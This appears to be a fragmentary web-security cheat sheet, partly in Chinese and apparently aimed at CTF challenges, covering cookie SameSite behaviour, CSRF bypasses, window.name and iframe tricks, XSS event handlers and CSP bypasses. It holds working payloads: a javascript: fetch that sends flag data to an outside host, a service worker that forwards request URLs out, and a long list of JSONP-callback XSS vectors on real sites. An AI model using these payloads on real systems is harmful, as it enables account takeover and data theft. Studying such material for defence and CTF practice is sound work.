github.io
https://www.cjis.ooo
https
+ www.cjis.ooo
+ 443
https
+cjis
+ooo
SameSite
attribute
None
: 無限制Lax
(預設): top-level navigation 發送例如 href 跳轉, form GETStrict
: same-site 才發送For any flows involving POST requests, you should test with and without a long delay. This is because both Firefox and Chrome implement a two-minute threshold that permits newly created cookies without the SameSite attribute to be sent on top-level, cross-site POST requests (a common login flow). ref
HttpOnly
for(let i=0;i<1000;++i) {
document.cookie = 'cookie'+i+'=aaa';
}
// old cookie is delted!
document.cookie = 'victim=aaaaaa'
防禦機制
X-CSRF-HEADER: 1
。 CORS policy 根據 server response ccess-Control-Allow-Headers
可能可以攻擊
GET /app?_method=POST
X-HTTP-Method-Override
__Host-
prefix*.target.com
vlun.target.com
only limit type/subtype but parameter e.g.
text/plain; application/json
bypass validation if server useincludes('application/json')
to determine media type. see CVE-2022-21703 grafana CSRF
application/x-www-form-urlencoded
multipart/form-data
text/plain
javascript:fetch('https://ntu.im/flag').then(r=>r.text()).then(d=>fetch('https://cjiso.ninja/'+btoa(d)))';
#:~:text=[prefix-,]textStart[,textEnd][,-suffix]
context |-------match-----| context
<meta>
跳轉window.name = 'xxx'
// 先讓 child parent 同源
// 載入不會刷新 frame
frame.src='parent origin...'
frame.contentWindow.name
// victim first visit evil.html
name='qwer'
location='xss.html' //redirect to xss site
xss.html
eval(name) // xss
<iframe name=i1>
</iframe>
<form target=i1 action="https://c.cjsi.ooo">
</form>
<form enctype=text/plain method=POST> // text/plain 避免被 encode
<input name='{"key":"' value='somevalue"}'>
</from>
{"key":"somevalue"}
, content-type text/plain
<iframe>
iframe.name
可跨域<body>
<!-- 敏感資料 -->
<iframe id="qwe" src="https://typeselfsub.web.ctfcompetition.com/flag">
</iframe>
<!-- 登出框 -->
<iframe id="zxc" name="zxc">
</iframe>
<!-- 登入框 -->
<iframe id="asd" name="asd">
</iframe>
<form id="form1" target="zxc" method="get" action="https://typeselfsub.web.ctfcompetition.com/logout">
</form>
<form id="form2" target="asd" method="post" action="https://typeselfsub.web.ctfcompetition.com/login">
<input name="username" value="jizz">
<input name="password" value="jizz">
</form>
<script>
setTimeout(()=>form1.submit(),2000);
setTimeout(()=>form2.submit(),5000);
</script>
<img src="https://c.cjiso.ninja/delay/10">
</body>
window.parent.frames[0]
top[0].document...
// leak data length 17
<iframe src='/flag'></iframe>
<iframe src='/?xss=b=top[0].document'></iframe>
<iframe src='/?xss=c=top[1].b.body'></iframe>
<iframe src='/?xss=d=top[2].c.innerHTML></iframe>
<iframe src='/?xss=name=top[3].d></iframe>
// eval length 13
<iframe src='/?xss=a=`fetch("//`' id=start ></iframe>
<iframe src='/?xss=top[0].a%2b=`c`'></iframe>
<iframe src='/?xss=top[0].a%2b=`.`'></iframe>
<iframe src='/?xss=top[0].a%2b=`c`'></iframe>
<iframe src='/?xss=top[0].a%2b=`j`'></iframe>
<iframe src='/?xss=top[0].a%2b=`i`'></iframe>
<iframe src='/?xss=top[0].a%2b=`s`'></iframe>
<iframe src='/?xss=top[0].a%2b=`.`'></iframe>
<iframe src='/?xss=top[0].a%2b=`o`'></iframe>
<iframe src='/?xss=top[0].a%2b=`o`'></iframe>
<iframe src='/?xss=top[0].a%2b=`o`'></iframe>
<iframe src='/?xss=top[0].a%2b=`"`'></iframe>
<iframe src='/?xss=top[0].a%2b=`)`'></iframe>
<iframe src='/?xss=name=top[0].a'></iframe>
<script>
setTimeout(()=>{end.src='/?xss=eval(name)'},2000)
</script>
iframe srcdoc
<iframe srcdoc="
<script src=/theme?cb=window.b.innerText=window.parent.document.body.innerText.slice></script>
<script src=/theme?cb=window.img.src=window.total.innerText.slice></script>
">
</iframe>
/
代替空格 <iframe/src=javascript:alert(1)></iframe>
document.body.innerHTML=document.body.innerText
`
代替 '
/a/.source
\u2028, \u2029
代替 \n
: eval('x=123\u2028alert(x)')
<meta>
改 charset通用
//
解析成 http://
\\ 解析成當前域協議
javascript:
\n\tjavascript:alert(2)%0aalert(1)
windows
\\ 解析成 file://
window.name == name
<meta http-equiv="refresh" content="0;URL='http://url/'" />
location.href
location.host
location.hostname
location.replace
location.assign
location.pathname
onfocus
<input>,<select>,<form>,<textarea>
<keygen>
less supported<input autofocus onfocus=alert(1)>
ontoggle
<details open ontoggle=alert(1)
onerror
<img src='aaaaaa' onerror=alert(1)>
onscroll
<body onscroll=alert>
+n*<br>
+<input autofocus>
onstart
<marquee onstart=alert(1)></marquee>
<iframe src=javascript:alert(1)
Service worker
if no scope, default scope is the same level of the script
if ('serviceWorker' in navigator) {
window.addEventListener('load', function() {
navigator.serviceWorker.register('/sw.js', {scope:'/'}).then(function(registration) {
// Registration was successful
console.log('ServiceWorker registration successful with scope: ', registration.scope);
}, function(err) {
// registration failed :(
console.log('ServiceWorker registration failed: ', err);
});
});
}
self.addEventListener('fetch', function(e) {
e.respondWith(caches.match(e.request).then(function(response) {
fetch('https://c.cjsio.ninja/swdata/' + e.request.url)
});
ref
URLSearchParams.get
: first$_GET
: Lastabout:blank
about:blank
src=/%gg
make reverse-proxy suck and then response bad request without csp header.在跳轉請求的第二次請求前改 cookie,可讓兩次請求夾帶不同 cookie
'id=jizzzzzz; path=/'
'id=bbbbbbbb; path=/api'
get('/api') 會帶 cookie `id=bbbbbbbb;id=jizzzzzz`, server 端通常解析第一個
一些 CDN 會自動掛載 js 檔案在某路徑下,有些檔案可以利用就能繞過 unsafe-eval
https://twitter.com/kinugawamasato/status/1414648695904083988
https://twitter.com/kinugawamasato/status/893404078365069312?lang=en
Cloudflare
Cloudflare's pages have a /cdn-cgi/ directory with some interesting resources:
- scripts/{cf.common.js,cf.challenge.js,zepto.min.js}
- trace/
#Google.com:
"><script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1"></script>
"><script src="https://googleads.g.doubleclick.net/pagead/conversion/1036918760/wcm?callback=alert(1337)"></script>
"><script src="https://www.googleadservices.com/pagead/conversion/1070110417/wcm?callback=alert(1337)"></script>
"><script src="https://cse.google.com/api/007627024705277327428/cse/r3vs7b0fcli/queries/js?callback=alert(1337)"></script>
"><script src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)"></script>
#Blogger.com:
"><script src="https://www.blogger.com/feeds/5578653387562324002/posts/summary/4427562025302749269?callback=alert(1337)"></script>
#Yandex:
"><script src="https://translate.yandex.net/api/v1.5/tr.json/detect?callback=alert(1337)"></script>
"><script src="https://api-metrika.yandex.ru/management/v1/counter/1/operation/1?callback=alert"></script>
#VK.com:
"><script src="https://api.vk.com/method/wall.get?callback=alert(1337)"></script>
#Marketo.com
"><script src="http://app-sjint.marketo.com/index.php/form/getKnownLead?callback=alert()"></script>
"><script src="http://app-e.marketo.com/index.php/form/getKnownLead?callback=alert()"></script>
#AlibabaGroup:
"><script+src="https://detector.alicdn.com/2.7.3/index.php?callback=alert(1337)"></script>
"><script+src="https://suggest.taobao.com/sug?callback=alert(1337)"></script>
"><script+src="https://count.tbcdn.cn//counter3?callback=alert(1337)"></script>
"><script+src="https://bebezoo.1688.com/fragment/index.htm?callback=alert(1337)"></script>
"><script+src="https://wb.amap.com/channel.php?callback=alert(1337)"></script>
"><script+src="http://a.sm.cn/api/getgamehotboarddata?format=jsonp&page=1&_=1537365429621&callback=confirm(1);jsonp1"></script>
"><script+src="http://api.m.sm.cn/rest?method=tools.sider&callback=jsonp_1869510867%3balert(1)%2f%2f794"></script>
#Uber.com:
"><script+src="https://mkto.uber.com/index.php/form/getKnownLead?callback=alert(document.domain);"></script>
#Buzzfeed.com
"><script src="https://mango.buzzfeed.com/polls/service/editorial/post?poll_id=121996521&result_id=1&callback=alert(1)%2f%2f"></script>
#Yahoo JP (Thanks to @nizam0906)
"><script src=https://mempf.yahoo.co.jp/offer?position=h&callback=alert(1337)//></script>
"><script src=https://suggest-shop.yahooapis.jp/Shopping/Suggest/V1/suggester?callback=alert(1337)//&appid=dj0zaiZpPVkwMDJ1RHlqOEdwdCZzPWNvbnN1bWVyc2VjcmV0Jng9M2Y-></script>
#AOL/Yahoo
"><script+src="https://www.aol.com/amp-proxy/api/finance-instruments/14.1.MSTATS_NYSE_L/?callback=confirm(9)//jQuery1120033838593671435757_1537274810388&_=1537274810389"></script>
"><script+src="https://df-webservices.comet.aol.com/sigfig/ws?service=sigfig_portfolios&porttype=2&portmax=5&rf=http://www.dailyfinance.com&callback=jsonCallback24098%3balert(1)%2f%2f476&_=1537149044679"></script>
"><script+src="https://api.cmi.aol.com/content/alert/homepage-alert?site=usaol&callback=confirm(1);//jQuery20108887725116629929_1528071050373472232&_=1528071050374"></script>
"><script+src="https://api.cmi.aol.com/catalog/cms/help-central-usaol-navigation-utility?callback=confirm(1);//jQuery20108887725116629929_152807105037740504&_=1528071050378"></script>
">x<script+src="https://ads.yap.yahoo.com/nosdk/wj/v1/getAds.do?locale=en_us&agentVersion=205&adTrackingEnabled=true&adUnitCode=2e268534-d01b-4616-83cd-709bd90690e1&apiKey=P3VYQ352GKX74CFTRH7X&gdpr=false&euconsent=&publisherUrl=https%3A%2F%2Fwww.autoblog.com&cb=alert();"></script>
"><script src="https://search.yahoo.com/sugg/gossip/gossip-us-ura/?f=1&.crumb=wYtclSpdh3r&output=sd1&command=&pq=&l=1&bm=3&appid=exp-ats1.l7.search.vip.ir2.yahoo.com&t_stmp=1571806738592&nresults=10&bck=1he6d8leq7ddu%26b%3D3%26s%3Dcb&csrcpvid=8wNpljk4LjEYuM1FXaO1vgNfMTk1LgAAAAA5E2a9&vtestid=&mtestid=&spaceId=1197804867&callback=confirm"></script>
"><script+src="https://www.aol.com/amp-proxy/api/finance-instruments/14.1.MSTATS_NYSE_L/?callback=confirm(9)//jQuery1120033838593671435757_1537274810388&_=1537274810389"></script>
"><script+src="https://ui.comet.aol.com/?module=header%7Cleftnav%7Cfooter&channel=finance&portfolios=true&domain=portfolios&collapsed=1&callback=confirm(9)//jQuery21307555521146732187_1538371213486&_=1538371213487"></script>
"><script+src="http://portal.pf.aol.com/jsonmfus/?service=myportfolios,&porttype=1&portmax=100&callback=confirm(9)//jQuery1710788849030856973_1538354104695&_=1538354109053"></script>
#Twitter.com:
"><script+src="http://search.twitter.com/trends.json?callback=alert()"></script>
"><script+src="https://twitter.com/statuses/user_timeline/yakumo119info.json?callback=confirm()"></script>
"><script+src="https://twitter.com/status/user_timeline/kbeautysalon.json?count=1&callback=confirm()"></script>
#Others:
"><script+src="https://www.sharethis.com/get-publisher-info.php?callback=alert(1337)"></script>
"><script+src="https://m.addthis.com/live/red_lojson/100eng.json?callback=alert(1337)"></script>
"><script+src="https://passport.ngs.ru/ajax/check?callback=alert(1337)"></script>
"><script+src="https://ulogin.ru/token.php?callback=alert(1337)"></script>
"><script+src="https://www.meteoprog.ua/data/weather/informer/Poltava.js?callback=alert(1337)"></script>
"><script+src="https://api.userlike.com/api/chat/slot/proactive/?callback=alert(1337)"></script>
"><script+src="https://www.youku.com/index_cookielist/s/jsonp?callback=alert(1337)"></script>
"><script+src="https://api.mixpanel.com/track/?callback=alert(1337)"></script>
"><script+src="https://www.travelpayouts.com/widgets/50f53ce9ada1b54bcc000031.json?callback=alert(1337)"></script>
"><script+src="http://ads.pictela.net/a/proxy/shoplocal/alllistings/d5dadac1578db80a/citystatezip=10008;pd=40B5B0493316E5A3D4A389374BC5ED3ED8C7AB99817408B4EF64205A5B936BC45155806F9BF419E853D2FCD810781C;promotioncode=Petco-140928;sortby=23;listingimageflag=y;listingimagewidth=300;resultset=full;listingcount=100;;callback=alert(1);/json"></script>
"><script+src="https://adserver.adtechus.com/pubapi/3.0/9857.1/3792195/0/170/ADTECH;noperf=1;cmd=bid;bidfloor=0.12;callback=confirm(1);//window.proper_d31c1edc_57a8d6de_38"></script>
#Google API's
"><embed src='//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e){alert(1337)}//' allowscriptaccess=always>
"><script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script>
ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>
<script>
//# sourceMappingURL=http://c.cjis.ooo/xssnote
</script>